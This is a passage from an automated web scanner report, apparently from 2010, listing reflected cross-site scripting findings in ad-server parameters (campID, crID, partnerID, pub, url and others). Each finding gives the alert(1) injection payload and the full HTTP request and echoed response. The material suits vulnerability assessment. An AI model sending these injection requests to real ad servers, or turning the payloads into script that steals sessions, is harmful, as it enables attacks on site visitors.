Host:	http://a.collective-media.net
Path:	/cmadj/bzo.361/L12_4858519

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbfb'-alert(1)-'b1123bee3bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.361/L12_4858519?cbbfb'-alert(1)-'b1123bee3bf=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7423
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-11716164_1290468919","http://ad.doubleclick.net//bzo.361/L12_4858519?cbbfb'-alert(1)-'b1123bee3bf=1;net=bzo;u=,bzo-11716164_1290468919,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_
...[SNIP]...

2.7. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [campID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 589e7"-alert(1)-"cee7e5ec283 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623589e7"-alert(1)-"cee7e5ec283&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8589

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
AAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623589e7"-alert(1)-"cee7e5ec283&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var
...[SNIP]...

2.8. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [crID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23f49"-alert(1)-"2e0dcad632a was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=6309623f49"-alert(1)-"2e0dcad632a&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8589

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
BAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=6309623f49"-alert(1)-"2e0dcad632a&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var fscUrl = ur
...[SNIP]...

2.9. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [partnerID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb27"-alert(1)-"af911592472 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38eeb27"-alert(1)-"af911592472&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8567

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
LTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38eeb27"-alert(1)-"af911592472&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var fscUrl = url;
var fscUrlClickTagFound = false;
var w
...[SNIP]...

2.10. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdc38"-alert(1)-"0b45d65bce0 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078bdc38"-alert(1)-"0b45d65bce0&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8589

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
tMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078bdc38"-alert(1)-"0b45d65bce0&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

2.11. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [pubICode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1b15"-alert(1)-"3edb6aed8b9 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142d1b15"-alert(1)-"3edb6aed8b9&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8567

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142d1b15"-alert(1)-"3edb6aed8b9&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3DIAOVF");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

2.12. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49bb6"-alert(1)-"a720e1fc341 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-6309649bb6"-alert(1)-"a720e1fc341&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:13:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8567

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
AAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-6309649bb6"-alert(1)-"a720e1fc341&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport&redirectURL=http%3a%2f%2fwww.adobe.com/products/acrobat.html%3Fttsrccat%3DOMKWS%26sdid%3D
...[SNIP]...

2.13. http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vulnerable.ad.partner
Path:	/adi/N4270.154361.33ACROSS.COM/B4882358.3

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85df1"-alert(1)-"cf0abb156f8 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N4270.154361.33ACROSS.COM/B4882358.3;sz=300x250;click=http://ad.yieldmanager.com/clk?2,13%3B2ee8284f76301d5d%3B12c75dac2fa,0%3B%3B%3B390997679,zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAA-MLadSwBAAAAAAAAAGM0MzY3MWVjLWY2OGQtMTFkZi04M2ZiLTAwMzA0OGQ3MDJjNAAzmSoAAAA=,,http%3A%2F%2Fwww.smh.com.au%2Fsport,$http://t.invitemedia.com/track_click?auctionID=1290467459814544-63096&campID=43623&crID=63096&pubICode=2101142&pub=256078&partnerID=38&url=http%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport85df1"-alert(1)-"cf0abb156f8&redirectURL=;ord={CACHEBUSTER}? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDABy6mkAAAAAAMcQHAAAAAAAAgAEAAIAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA6KSUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxmMGKuN..j-mcGfTz2MFQHZPHhZqDRBAHGlfLwOEFkDhehSuR2EQQM5gkDWl-RZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTbu9EA90zCW7Lm0YQBIrfyiyKwLhZ3Z-5UiUtAAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D300x250%26s%3D814544%26r%3D1%26_salt%3D1223098767%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c43671ec-f68d-11df-83fb-003048d702c4
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Pragma: no-cache
